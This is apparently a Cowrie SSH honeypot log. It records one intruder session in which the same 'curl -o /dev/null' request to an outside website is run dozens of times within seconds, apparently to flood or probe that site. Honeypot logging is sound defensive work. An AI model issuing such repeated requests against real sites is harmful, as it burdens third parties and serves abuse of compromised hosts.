{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.605799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.646535Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.647543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.688932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.689952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.742970Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.744049Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.783329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.784284Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.823405Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.824545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.863229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.864143Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.904045Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.905031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.943770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.945014Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:36.993871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:36.994601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.032228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.033274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.070968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.071862Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.119702Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.120736Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.169007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.169924Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.220417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.221521Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.273009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.274229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.317192Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.318259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.355135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.356010Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.393325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.394483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.431952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.432873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.469209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.470037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.506722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.508165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.545264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.546185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.592893Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.593820Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.631500Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.632314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.669777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.670724Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.707127Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.708060Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.744596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.745467Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.781589Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.782427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.819389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.820288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.868209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.869041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.906947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.907840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:37.956168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:37.957074Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.005859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.006900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.046770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.047711Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.091122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.092066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.130595Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.131547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.175206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.176399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.213310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.214417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.251962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.252944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.289890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.290858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.327629Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.328803Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.365614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.366467Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.414806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.415725Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.452399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.453550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.490934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.492134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.529445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.530560Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.567882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.569426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.824890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.825808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.866559Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.867550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.904195Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.905054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.942165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.943032Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:38.987479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:38.988377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.035666Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.036775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.074244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.075247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.163325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.164264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.202278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.203255Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.243632Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.244693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.281118Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.283008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.322435Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.323392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.367998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.368985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.406916Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.408088Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.447677Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.448698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.503655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.504587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.543307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:39.544493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:39.583040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
